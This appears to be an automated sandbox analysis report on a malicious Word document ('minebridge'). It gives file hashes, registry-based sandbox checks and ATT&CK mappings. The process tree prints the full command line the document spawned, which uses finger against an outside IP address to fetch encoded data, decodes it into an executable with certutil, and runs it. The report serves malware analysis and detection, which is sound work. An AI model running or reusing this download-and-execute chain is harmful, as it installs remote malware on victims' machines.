321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67

General

Target

321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc
Size

118KB
MD5

f95643710018c437754b8a11cc943348
SHA1

f590e1b6a80cf3e8360388382eabb04b3e247b78
SHA256

321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67
SHA512

f39abfd51e62f145376b5587cd515072e01740e10e967f401057c00403017c6754264bed08f8bef819829a80762ce572b40463b7854db33a961ff2e624509fba

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4072 3460 cmd.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4072	3460	cmd.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

644 WINWORD.EXE
644 WINWORD.EXE

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

WINWORD.EXE

pid	process
644	WINWORD.EXE
644	WINWORD.EXE
644	WINWORD.EXE
644	WINWORD.EXE
644	WINWORD.EXE
644	WINWORD.EXE
644	WINWORD.EXE
644	WINWORD.EXE
644	WINWORD.EXE
644	WINWORD.EXE
644	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 4072 wrote to memory of 3748	4072	cmd.exe	finger.exe
PID 4072 wrote to memory of 3748	4072	cmd.exe	finger.exe
PID 4072 wrote to memory of 2284	4072	cmd.exe	certutil.exe
PID 4072 wrote to memory of 2284	4072	cmd.exe	certutil.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:644

C:\Windows\system32\cmd.exe
cmd /C finger nc20@184.164.146.102 > %appdata%\vUCooUr >> %appdata%\vUCooUr1 && certutil -decode %appdata%\vUCooUr1 %appdata%\vUCooUr.exe &&cmd /C del %appdata%\vUCooUr1 && %appdata%\vUCooUr.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4072

C:\Windows\system32\finger.exe
finger nc20@184.164.146.102
2⤵
PID:3748

C:\Windows\system32\certutil.exe
certutil -decode C:\Users\Admin\AppData\Roaming\vUCooUr1 C:\Users\Admin\AppData\Roaming\vUCooUr.exe
2⤵
PID:2284

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\vUCooUr1
MD5
4a172ad904d3b6d2d23104ba89db22e8

SHA1
946884ab538d08aac9179005ac24df586d995a76

SHA256
a2fca7801a8ec4b1e9472fc7cdf0d18e91b9f154b027405d6a7e544fb5890c8e

SHA512
96e8f1934781adcbcac3ddf6490fae332535db5adcde793919530d9d6ea622291e1c806136c4f655e3c0115d9262bc1fc2ec6e5edaf8b0496c1e30128798c7ee

Download Submit
memory/644-2-0x000001EA94F20000-0x000001EA95557000-memory.dmp

Filesize
6.2MB

Download
memory/2284-4-0x0000000000000000-mapping.dmp

Download
memory/3748-3-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads